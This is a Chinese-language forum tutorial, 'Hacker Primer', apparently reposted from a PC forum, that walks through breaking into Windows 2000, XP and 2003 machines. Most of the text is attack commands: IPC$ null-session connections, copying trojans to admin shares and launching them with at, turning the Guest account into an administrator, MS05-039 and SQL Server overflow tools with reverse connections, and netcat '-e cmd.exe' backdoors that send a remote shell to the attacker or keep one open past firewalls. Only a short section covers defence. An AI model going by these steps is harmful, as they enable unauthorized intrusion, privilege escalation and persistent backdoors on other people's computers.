黑客入门

黑客入门

今天天气好，好想写了一篇文章。结果写了（好废啊~~555），因为自己是读紧网络专业的，不懂黑客技术是不行的，所以看过好多文章大部分都是从WINDOWS开始的初级入侵和防范，现在看多了技术也有些进步所以想写下以前自己做菜鸟黑客的心得和一写基本防范。好废话少讲，我们开始了。
首先，我们用的平台一般WIN2000或XP或2003，以下的系统估计很少，因为缺少多协议和漏洞所以没必要去攻击，我们以最多人用的WIN XP为例攻击WIN2000或WINXP或WIN2003的机子（应该服务器类WIN2000多）。
先来试试手吧``打开运行—CMD——，
1.建立空连接net use \\***.***.***.***\ipc$ "" user:""(*是IP，要注意这一行命令中包含了3个空格)。

2.建立非空连接net use \\***.***.***.***\ipc$ 用户名 user密码(在你知道对方机帐号密码时可用)。

3.映射默认共享（最重要，哈哈得到对方的盘你还想点做呢```）net use *：\\***.***.***.***\*$ 密码 user用户名 (前面第一个*是自己本地想映射的盘，后面的*是映射被攻击机的盘例如net use s: 192.168.1.1\\c$(映射对方C盘为自己的S盘)注意的是映射时必须与对方建立一个IPC$连接。

4.删除共享映射 net use c del 删除映射的c盘，net use  del 删除全部,会有提示要求按y确认。

再来。我们用木马进行攻击
C:\>net use \\127.0.0.1\IPC$ "" /user:admintitrators （建立一个IPC连接）

　　我们流光这个好用的软件扫到的用户名是administrators，密码为"空"的IP地址，如果攻击的话，就可以用命令和127.0.0.1建立一个连接，因为密码为"空"　。　　　 
C:\>copy srv.exe \\127.0.0.1\admin$ （复制srv.exe上去，这个文件在流光的Tools目录里的） 
C:\>net time \\127.0.0.1 （这个基本命令是查对方的的时间，后面会用到的。例如我们用这命令查到对方机是2005/11/1 下午 14:03）那么我们就：
C:\>at \\127.0.0.1 14:05 srv.exe （at其实就是我们日常的计划任务啦``哈哈`用at命令启动srv.exe吧``很多黑客软件都会有远程启动命令来做一般的攻击例如某某时间掸出别人机的光区`就是这命令`不过用手动比较威``嘻。这里设置的时间当然比主机时间快，不然你什么启动。）如果时间没搞好可以再下多次的，好了我们确定运行了对方里的SRV后--
建入C:\>telnet 127.0.0.1 99 （端口是99。Telnet默认是23端口，我们使用SRV与对方机子建立了一个99端口的CMD）所以我们Telnet上去，但是SRV是一次性，下次再来玩就要再来一次相当麻烦所以我们还要建立一个Telnet服务，这要用到ntlm了。重复上步操作复制ntlm.exe到对方机上：
C:\>copy ntlm.exe \\127.0.0.1\admin$ （ntlm.ex也是在流光的Tools里）直接在对方的CMD运行 C:\WINNT\system32>ntlm.exe（当出现DONE的时,说明已经启动正常,z再使用net start telnet来开启Telnet服务。  Telnet 127.0.0.1输入用户名与密码就进入对方机，你要知道得到对方的CMD你是等于得好对方的整台机。
最后我们将对方的Guest用户激活
C:\>net user guest /active:yes（默认是关的），
改guest密码C:\>net user guest 1234，将Guest变为Administrato权限C:\>net localgroup administrators guest /add，自己建立一用户也可以的C:\>net user ** *（*前*个是你的自己建的用户名，后*是密码，注意中间空格）。
最后最最后等我们来防范下，其实我们只要关了默认共享就没什么事的（漏洞攻击无效果哦~）

1、清除默认磁盘共享：修改注册表：HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\parameters增加AutoShareServer子键（REG_DWORD），键值为0 （如果无可以自己加进去）
2、清除默认ADMIN$共享：修改注册表：HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\parameters增加AutoShareWks子键（REG_DWORD），键值为0
3、清除IPC$共享(适用2000)：在你的某个目录下建立一个bat文件，例如c:\\ipc\\delipc.bat内容如下：net share ipc$ /del，然后把这个批处理加入“启动”（在注册表里添加也可）或加入组策略中都行。还可以用天网，金山，等杀毒软件屏蔽PING或139和445等开放式端口。
好了，下次我会写给大家用WINDOWS漏洞来攻击和NC的使用，服务器SQL的攻击与防范的等等（大家支持下我，写得手很累。）

 
接上。
下课了马上赶回宿舍写完下部分，好了今次我写的是WINDOWS漏洞攻击。各位高手不要泼水啊。好`我们开始，首先我们要知道漏洞方面的知识，大家都知道WINDOWS出名漏洞多``利用漏洞攻击是常事，要发现一个漏洞不难`在与你有无去发现（我发现的被公布了，嘻）。好先来介绍下最紧的漏洞（太多了难找，），我找到一个简单的漏洞MS05039，这是一个益出漏洞，如果系统是XP SP1和2000的就会有（记得更新哦），我们通过一个漏洞工具MS05039.EXE来进行攻击（各大网站有下有中文也英文是一样的，只能对SP2以下版本进行攻击），首先，我们需要一个工具NC.EXE（详细解释我以后会说，现在先讲简单用法）。
运行——CMD，把MS05039.EXE放在任何盘，例如放C盘，我们就在CMD下运行：
MS05039 ***.***.***.*** ***.***.***.*** 端口 1（前面4个字节IP是你要攻击的对方IP，后面4字节是自己的，因为这是一个回弹连接。端口：是你用NC打开的端口，用来连接对方的端口，1：是版本名英文版就改0.中文是1）。
我们再开一个CMD（用来打开NC.EXE的）运行CMD——NC -lP 端口（-lP是组合建也可以-l -P。-l监听模式，用于入站连接，-P是打开端口。端口：你可以任意打开自己的，例如1234.7777等，不过要攻击时不要用这么容易的端口，很容易给人发现的）好。
我们做个例子：
我要入侵192.168.1.100的机，我自己的IP是192.168.1.101，我打开CMD——MS05039 192.168.1.100 192.168.1.101 8888 1（先不要按回车住，步叙可以乱，但是NC必须先运行，注意两个IP之间有空格，把NC放在主盘比较好运行，不用跳去其他盘）我在运行一个CMD ，NC -lP 8888（回车）可见NC在运行了，好不要动他``我们在回到另外的CMD按回车`等运行出现5个数据OK``则回连接成功了。大家看看我们NC那个CMD啦~~显示什么看看就知道``哈哈`对方的主盘下的WINDOWS\SYSTEM32。OK得手了，可以运用我第一篇文章的基本命令了例如改管理员密码NET USER命令，打开对方共享NET SHARE等等，就等于在自己的机上运行CMD一样简单。（大家还可以在他CMD下用NETSTAT -AN看看他机连接IP和端口是不是有自己机的连接呢？西西）



来拉``最后的一篇啦！！
最后的一篇是服务器攻击篇，一般的服务器都是win2000 SE机上多数是装了MS SERVER SQL，那么机就会自动开1433端口。

我们去下载个溢出1433工具，这里需要两个工具NC.EXE（我上篇介绍过）和SQ12.EXE（一个攻击工具）

首线我们在自己机上运行cmd。（放在主盘吧`）打开c:>nc -l -p 40回车（打开端口与连接端后，与上篇一样NC必须要先运行，要比工具早运行就可以了）
接着再运行多一个cmd—c:>sql2.exe 打入入***.***.***.*** ***.***.***.*** 端口 0回车（前4是入侵服务器的IP，后面是自己IP，这个MS05039差不多吧）再是命令中的0不行的话，你就试试1或2。如果入侵IP有这个漏洞话，好了命令成功完成NC的CMD得到对方的c:\winnt\system32>你成功了，得到对方的CMD了又是自己动手时间。当然是打开被禁止的GUEST用户了net user guest /active:yes ，就将默认禁止的guest用户激活。net user guest 123456这样guest的密码变成123456了。
net localgroup administrators guest /add这就是guest成为最高权限的管理员了。　写在最后面，总的来说漏洞软件和黑客工具都是为了得到CMD的``因为得到CMD就等于控制了整台机，大家要小心，用一写软件禁用139和445等常用开放端口的确很有用，就例黑软`广外女生``就不能遥过天网的阻止，所以都是建议大用天网，下面我就介绍下NC:
NC的功能相当强``被称为瑞士军刀。
1、-v
详细输出——用两个-v可得到更详细的内容，和其他参数连用。
2、-w secs
超时，以秒计。只在双机发生连接后开始计时。
3、-p port
打开本地端口号。例：nc -p 8888

4、-l
监听模式，用于入站连接。和-v参数与>>符合连用可以记录本机接收到
的数据包。例：（nc -vv -w 5 -l -p 80>>80.txt），这样就把80端口收
到的数据写入txt文件中，连接5秒后会自动断开。可以做个批处理文件看：
@echo off
color f0
:start
cls
C:\\nc -vv -w 3 -l -p 80>>80.txt
goto start
把防火墙关掉以后运行这个批处理，会监听到许多探测U漏洞的信息，大多
是三条一组--妮姆达病毒扫描你的。

5、-e prog
程序重定向，一旦连接，就执行。例：（nc -e 程序名称 IP 端口）
应用举例：
先把nc.exe传到对方电脑的winnt下（即Admin$下)，令cmd.exe在上
午十点二十五分连接到自己的7878端口：
at \\\\对方IP 10:25Am nc -e cmd.exe 自己IP 7878
在自己电脑上用-l参数和-p参数开7878端口监听（nc -vv -l -p 7878） 
这样只要对方连接过来，我们就进入了他的winnt\\system32文件夹下。
也可以：at \\\\对方IP 10:25Am nc -l -p 23 -t -e cmd.exe 这是绑定
cmd.exe到telnet端口等待连接,直接telnet IP就可以进入对方机器。
6、-h
帮助。

7.端口扫描
例(nc -vv IP地址 -w 2 80 21-25 1433),这就是一个简单的端口扫描
器，将按照主机名-IP-端口（名称）-端口状态来显示，如果不加-w
参数，扫到端口后会停下来等待用户输入命令。

8.-o file
记录16进制的传输。和>>file有点象似，第一列是内存地址，第二列是
16进制的字符码，第三列是接收到的报文。例如探测网络焦点的端口：
(nc -vv -w 2 -o test.txt www.163.com 80 21-25)，会将报文写入
一个test.txt的文件中。

9.-L与-e参数配合
在对方电脑上运行（nc -L -p 53 -d -e cmd.exe），可以突破防火墙。
-L参数是即使本次连接断掉，nc.exe仍然在运行。53号端口是Domain Name
Server域名服务端口，应该不会受到防火墙的封索，我们用nc vv IP 53
这样就连进去啦。并且只要nc进程不被杀掉，这个后门一直存在。嘿嘿，
说是这样说，第三方应用程序例如天网就能把nc拦住，我试了139、1025、
445都无效 那个-d参数是为了出错后不显示信息。139要加参数-s（nc
-L -p 139 -d -e cmd.exe -s 对方本机IP）这样就可以保证nc.exe优先
于NETBIOS。。

写完了，大家提点下``写得真是好辛苦的`以后有什么攻击我会再来的`，因为多到一批布长`写1年都没写完了，但是还是要学习才会认识，希望大家学习学习，我也学习学习，最后都是那句小心一些来历不明的程序，和邮件不要乱接，一些可以被你看到在后台服务的木马可以删，但是有些捆绑后就见不到，可以通过杀毒来清除，有漏洞就要更新。祝大家变成高手高人
----摘自太平洋电脑网论坛昵称： 小觉゛мaи﹏